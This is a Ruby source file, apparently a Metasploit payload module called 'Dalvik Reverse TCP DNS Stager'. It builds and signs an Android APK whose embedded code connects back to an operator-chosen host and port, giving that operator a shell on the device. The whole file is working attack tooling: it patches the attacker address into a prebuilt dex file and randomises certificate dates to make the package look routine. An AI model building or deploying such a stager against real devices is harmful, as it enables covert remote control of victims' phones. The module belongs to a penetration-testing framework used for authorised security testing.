reverse_tcp_dns

1. ##
2. # This module requires Metasploit: http//metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. ##
5.  
6. require 'msf/core'
7. require 'msf/core/handler/reverse_tcp'
8. require 'msf/base/sessions/command_shell'
9. require 'msf/base/sessions/command_shell_options'
10.  
11. module Metasploit3
12.  
13.   include Msf::Payload::Stager
14.   include Msf::Payload::Dalvik
15.  
16.   def initialize(info = {})
17.     super(merge_info(info,
18.       'Name'            => 'Dalvik Reverse TCP DNS Stager',
19.       'Description' => 'Connect back stager',
20.       'Author'      => 'timwr (DNS port by Edszx)',
21.       'License'     => MSF_LICENSE,
22.       'Platform'        => 'android',
23.       'Arch'            => ARCH_DALVIK,
24.       'Handler'     => Msf::Handler::ReverseTcp,
25.       'Stager'      => {'Payload' => ""}
26.     ))
27.   end
28.  
29.   def string_sub(data, placeholder, input)
30.     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
31.   end
32.  
33.   def generate_jar(opts={})
34.     jar = Rex::Zip::Jar.new
35.  
36.     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
37.  
38.     string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_str) if datastore['LHOST']
39.     string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
40.     jar.add_file("classes.dex", fix_dex_header(classes))
41.  
42.     files = [
43.       [ "AndroidManifest.xml" ],
44.       [ "res", "drawable-mdpi", "icon.png" ],
45.       [ "res", "layout", "main.xml" ],
46.       [ "resources.arsc" ]
47.     ]
48.  
49.     jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
50.     jar.build_manifest
51.  
52.     x509_name = OpenSSL::X509::Name.parse(
53.       "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
54.       )
55.     key  = OpenSSL::PKey::RSA.new(1024)
56.     cert = OpenSSL::X509::Certificate.new
57.     cert.version = 2
58.     cert.serial = 1
59.     cert.subject = x509_name
60.     cert.issuer = x509_name
61.     cert.public_key = key.public_key
62.  
63.     # Some time within the last 3 years
64.     cert.not_before = Time.now - rand(3600*24*365*3)
65.  
66.     # From http://developer.android.com/tools/publishing/app-signing.html
67.     # """
68.     # A validity period of more than 25 years is recommended.
69.     #
70.     # If you plan to publish your application(s) on Google Play, note
71.     # that a validity period ending after 22 October 2033 is a
72.     # requirement. You can not upload an application if it is signed
73.     # with a key whose validity expires before that date.
74.     # """
75.     # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
76.     cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
77.  
78.     jar.sign(key, cert, [cert])
79.  
80.     jar
81.   end
82.  
83. end